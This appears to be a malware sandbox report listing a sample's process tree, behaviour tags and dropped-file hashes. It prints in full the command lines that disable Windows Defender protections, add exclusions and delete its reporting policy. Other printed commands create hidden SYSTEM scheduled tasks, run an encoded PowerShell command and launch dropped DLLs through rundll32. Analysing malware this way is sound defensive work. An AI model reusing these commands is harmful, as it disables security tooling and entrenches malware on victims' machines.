C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:460 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:3236 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4468
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:2116
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:3984
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:1408
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:2260
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:2172
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:2888
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4264
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:1400
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:2436
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4528
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4636
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:3404
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:2488
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:64
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4988
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:3740
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:1260
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:1392
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:5060
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:1736
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:1968
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:1908
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:2028
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FHyUItRmbDQJtgsSWlR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FHyUItRmbDQJtgsSWlR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gUXCkMfuWzCyC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gUXCkMfuWzCyC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gcyASImYjZBU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gcyASImYjZBU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vCYWhmhlU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vCYWhmhlU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yqOJJFIvHNUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yqOJJFIvHNUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\QtEKgGNERTHTknVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\QtEKgGNERTHTknVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\LzrOtnkAyuDpOCzW\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\LzrOtnkAyuDpOCzW\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2016 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FHyUItRmbDQJtgsSWlR" /t REG_DWORD /d 0 /reg:323⤵PID:1484
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FHyUItRmbDQJtgsSWlR" /t REG_DWORD /d 0 /reg:324⤵PID:1732
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FHyUItRmbDQJtgsSWlR" /t REG_DWORD /d 0 /reg:643⤵PID:5056
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gUXCkMfuWzCyC" /t REG_DWORD /d 0 /reg:323⤵PID:1696
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gUXCkMfuWzCyC" /t REG_DWORD /d 0 /reg:643⤵PID:388
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gcyASImYjZBU2" /t REG_DWORD /d 0 /reg:323⤵PID:1704
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gcyASImYjZBU2" /t REG_DWORD /d 0 /reg:643⤵PID:3692
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vCYWhmhlU" /t REG_DWORD /d 0 /reg:323⤵PID:3836
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vCYWhmhlU" /t REG_DWORD /d 0 /reg:643⤵PID:932
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yqOJJFIvHNUn" /t REG_DWORD /d 0 /reg:643⤵PID:4392
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yqOJJFIvHNUn" /t REG_DWORD /d 0 /reg:323⤵PID:2296
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\QtEKgGNERTHTknVB /t REG_DWORD /d 0 /reg:323⤵PID:1876
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\QtEKgGNERTHTknVB /t REG_DWORD /d 0 /reg:643⤵PID:620
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS /t REG_DWORD /d 0 /reg:323⤵PID:3960
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS /t REG_DWORD /d 0 /reg:643⤵PID:2656
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\LzrOtnkAyuDpOCzW /t REG_DWORD /d 0 /reg:323⤵PID:1580
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\LzrOtnkAyuDpOCzW /t REG_DWORD /d 0 /reg:643⤵PID:4228
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gOVfgYpaG" /SC once /ST 11:19:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:3576 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gOVfgYpaG"2⤵PID:4692
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gOVfgYpaG"2⤵PID:340
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ehnYTuGzyhWqfGFsn" /SC once /ST 07:24:46 /RU "SYSTEM" /TR "\"C:\Windows\Temp\LzrOtnkAyuDpOCzW\ASUEhtNmEGCZDbi\apHgcpf.exe\" 4c /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1996 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ehnYTuGzyhWqfGFsn"2⤵PID:220
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3596 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3220
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4984
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2828
-
C:\Windows\Temp\LzrOtnkAyuDpOCzW\ASUEhtNmEGCZDbi\apHgcpf.exeC:\Windows\Temp\LzrOtnkAyuDpOCzW\ASUEhtNmEGCZDbi\apHgcpf.exe 4c /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2464 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bPisEBnRwoxYOmuHrm"2⤵PID:2600
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:2096
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:3928
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:1936
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:3272
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\vCYWhmhlU\ytnWjB.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ulJHerdNyNJKzGw" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3080 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ulJHerdNyNJKzGw2" /F /xml "C:\Program Files (x86)\vCYWhmhlU\fuRnhIw.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2592 -
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ulJHerdNyNJKzGw"2⤵PID:956
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ulJHerdNyNJKzGw"2⤵PID:4468
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RRtdPhcgeMAKnR" /F /xml "C:\Program Files (x86)\gcyASImYjZBU2\EHRjqBf.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4972 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "DBZKNiGxmOsGA2" /F /xml "C:\ProgramData\QtEKgGNERTHTknVB\kmRvfci.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3196 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "tMaUGjMWirHLUJOBi2" /F /xml "C:\Program Files (x86)\FHyUItRmbDQJtgsSWlR\jQdzAOm.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4796 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YgCwwruigbnUpvnuIqJ2" /F /xml "C:\Program Files (x86)\gUXCkMfuWzCyC\vbpmRvB.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1084 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "AFcndnMIJqNXhoPDJ" /SC once /ST 09:35:55 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\LzrOtnkAyuDpOCzW\zTgfljcE\pBFwEpx.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3740 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "AFcndnMIJqNXhoPDJ"2⤵PID:3660
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:868
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:4384
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:3568
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:3188
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ehnYTuGzyhWqfGFsn"2⤵PID:1564
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\LzrOtnkAyuDpOCzW\zTgfljcE\pBFwEpx.dll",#1 /site_id 5254031⤵PID:2080
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\LzrOtnkAyuDpOCzW\zTgfljcE\pBFwEpx.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4512 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "AFcndnMIJqNXhoPDJ"3⤵PID:2140
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵PID:1148
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD55279b722b74bd8382bc9080d4b013890
SHA136bdf648ae3231d0c0e9f98106533e08b382e1fd
SHA2561d62b29b0371808d4ebb0199e4bbc076e2f4d5ccc5a4f3df09ae37930051197e
SHA512ccf20a5d8edbfd2ea37d59f60db2aa87f5a733170b333bdad20bdc5ea9f32ff347fb6c8b9d1b84e0928b0311c56262c1b2c06c361155050f8d6ce87f3f713a6a
-
Filesize
2KB
MD51daa22cc022d7ce90c18468840d9e4f1
SHA1030b9c2260248726ff9c7eba938564ce76c2cc47
SHA2561b254252708cba49576fa281759b7a0105e02da5e858993dc9c11221052586b8
SHA5124084df1424cd6a800a74ea7e3aac4e1ad30053d43c8416be1d1a2ea6e37812380cab25da582cd3d9b3b5d3cc609b66f3c99f3656856c920ae7436bbcec64a6e4
-
Filesize
2KB
MD5cf6060cf5bd563427567b3dcaa4efd16
SHA1bf57bb50154ec360cfb851c07e3cab7cee858a83
SHA25635a3f0dfb831e6fae67cf8c339ecd181b6352e22f41fcbf074deec622a02f9d6
SHA51244810186ba23df21d51352a95bd500702c5784b10b34295c2369b8ab34f6a2b520ce7d0618611c07bd3a5c547d283d349ede8344250627ddeb4a8060a6a67295
-
Filesize
2KB
MD5fc8e0c3864418f4027563b648562c201
SHA150a2147a546fe991f0aff2914b051db806d77311
SHA2567b2b873b628ec693d592b4e141ed1f52dbe46022836d921e5c1d6f1d0b3f0af9
SHA512dceb75e474bec4756b01fa7086114ce4e53d3d41355c7651d73cc7794398ff03bce53f9c14799cf47f8c942fd92b41fccfbd97bbe37c4380455705a83b2979be
-
Filesize
2KB
MD506e21d46225f3b812f943a559c3b8bb8
SHA1db66fc2866bf833c11c6c2dc620c4dc855e8b781
SHA2562491cc46fff35cadfddc4c78c34c5c87c8d10ed3aaf8b34795a3fabec356a3da
SHA5125d0312a1ab0231b3f2d71c861eb60b0edda8ec2e145ae9bb6470e3061e05f2696ef78d08b0c462b8b15dae62a9e2f71913817f8bfe5c1d1b0473491bbcc63b65
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD53ca1082427d7b2cd417d7c0b7fd95e4e
SHA1b0482ff5b58ffff4f5242d77330b064190f269d3
SHA25631f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3
-
Filesize
6.3MB
MD5908f64c2981debda15e24188f61d3e07
SHA161b9365716059084fb53364665b87df0bbbf2ea5
SHA256161c487addec818c7d20f9adf9c94261d311605cb0c01e46cc7b9b74e80c75ca
SHA51252183db4f08cc1b07b5cdf964cea596e8c7716fd0d4b533e4ebdc3adae03edd6e7462db00bf64b6b557b73464b0ebe8ad67bf29cda2db2bb8ec4aa2832ff6b7b
-
Filesize
6.3MB
MD5908f64c2981debda15e24188f61d3e07
